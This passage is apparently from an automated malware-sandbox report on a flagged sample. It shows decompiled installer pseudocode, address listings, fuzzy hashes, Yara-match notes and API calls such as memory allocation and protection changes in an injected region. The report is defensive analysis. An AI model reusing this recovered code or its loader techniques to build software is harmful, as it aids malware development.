										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 032A167E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

=kc, xrefs: 032A374E

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: =kc
API String ID: 0-3127132602
Opcode ID: 172436daf00953bfa430ef0cee142a2503d8fbf7ec7787c886fe899ff63ae4c6
Instruction ID: 79b5929d97e996578fb1141d5a53c74469024699e9b3922c8d83b44836a453f8
Opcode Fuzzy Hash: 172436daf00953bfa430ef0cee142a2503d8fbf7ec7787c886fe899ff63ae4c6
Instruction Fuzzy Hash: 49E1ED42E3FB16CBD7A3E038C1407E65A90DF27792F118F1B9826B1561F79B5ACE0984

Uniqueness

Uniqueness Score: -1.00%

Function 032AA429 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,51E21D21,1D7C4BB4,032A355D,00000000), ref: 032B12D3

Strings

Zt&R, xrefs: 032AA5B6

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: Zt&R
API String ID: 1029625771-2427929514
Opcode ID: 2b8a2570f514c33c3c5cf32d570ffb24eb51a01a84b3ae252871920416a5bab7
Instruction ID: f09111dc7d2de399b24ab59e2682dd12b71458a5f6a06a9357470c8a61aef68f
Opcode Fuzzy Hash: 2b8a2570f514c33c3c5cf32d570ffb24eb51a01a84b3ae252871920416a5bab7
Instruction Fuzzy Hash: F3C12DB46147498FDB38CF28C9947EA37B2EF95350F58816ADC4A8B606D3709A82CF11

Uniqueness

Uniqueness Score: -1.00%

Function 032A4BB6 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

$}?K, xrefs: 032A4D94

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: $}?K
API String ID: 0-3958222418
Opcode ID: 264b7b79b3e1859124a6e74be77a6440de7e7d5d835e4b33d391560c1e3aabbe
Instruction ID: c3882e6bb0ed3bfa96c3080d45986d5c4dcc2f29e9b3ea92dac14d9d175215e5
Opcode Fuzzy Hash: 264b7b79b3e1859124a6e74be77a6440de7e7d5d835e4b33d391560c1e3aabbe
Instruction Fuzzy Hash: 6E813830A1839ACBEB25DF3A8C907D97BB2AF42784F5985AECC499B245C3B05895C741

Uniqueness

Uniqueness Score: -1.00%

Function 032B1DB7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 032B11DD: LoadLibraryA.KERNELBASE(?,51E21D21,1D7C4BB4,032A355D,00000000), ref: 032B12D3

NtAllocateVirtualMemory.NTDLL(-7950BEC5,?,-287842AA), ref: 032B1FF3

Strings

=kc, xrefs: 032A374E

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: =kc
API String ID: 2616484454-3127132602
Opcode ID: f6b0057dde0e962055bedfc72ac79835c43e9f6f9594cd11d4453bf3004e05a3
Instruction ID: ecdb458f275362c35a195ed9c0235a176a2e2adc7e3adf3a5b2434cd8dbe7e45
Opcode Fuzzy Hash: f6b0057dde0e962055bedfc72ac79835c43e9f6f9594cd11d4453bf3004e05a3
Instruction Fuzzy Hash: 2C513534614345DBDB39DE28CC917EE77B2AF8A384F50442DDC8ADB624CB359A928B01

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4.v..v,?,762E2EE0,00405D94,?,762E3420,762E2EE0), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Uniqueness

Uniqueness Score: -1.00%

Function 032B060A Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,1D4C6866), ref: 032B0A3B

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 38ead45aa5eed27041c3e1c1337f67a4157321daad836a34c8972e9bba51a06a
Instruction ID: f79b323e5c5154574a3fac58444b19e3cebafd3468187340cd4daa47d4ed1d71
Opcode Fuzzy Hash: 38ead45aa5eed27041c3e1c1337f67a4157321daad836a34c8972e9bba51a06a
Instruction Fuzzy Hash: 8231493A964349DFEB61DE3189513EB72B76FD0390F17C11E8C4A97504D7B09AC68782

Uniqueness

Uniqueness Score: -1.00%

Function 032B3B34 Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 032B3BF9

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e5957e60b955776337b204acc5c3fd55fddb86967d34136c8c612e0424c69653
Instruction ID: 9c9daab44bc7c7b58495f9a101ad2ff8c99fd661066938af6925cc999a576f30
Opcode Fuzzy Hash: e5957e60b955776337b204acc5c3fd55fddb86967d34136c8c612e0424c69653
Instruction Fuzzy Hash: DD011D715042848FEB74CF29C9886EAB7E6EFD4300F55441EED4D9B215C77099458B12

Uniqueness

Uniqueness Score: -1.00%

Function 032A43BE Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78b64d07b2a0da8e8445f0e8f9dffc7fc806075cedec903b190675746e44de6
Instruction ID: 87d36722b6be5827474532491a213684412e8e27ad8679580002c4446fa280d7
Opcode Fuzzy Hash: d78b64d07b2a0da8e8445f0e8f9dffc7fc806075cedec903b190675746e44de6
Instruction Fuzzy Hash: 7051E3308597DD8FE722CF3A8C54699BFA1AF42604F1989DED8809F2C7C371549ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
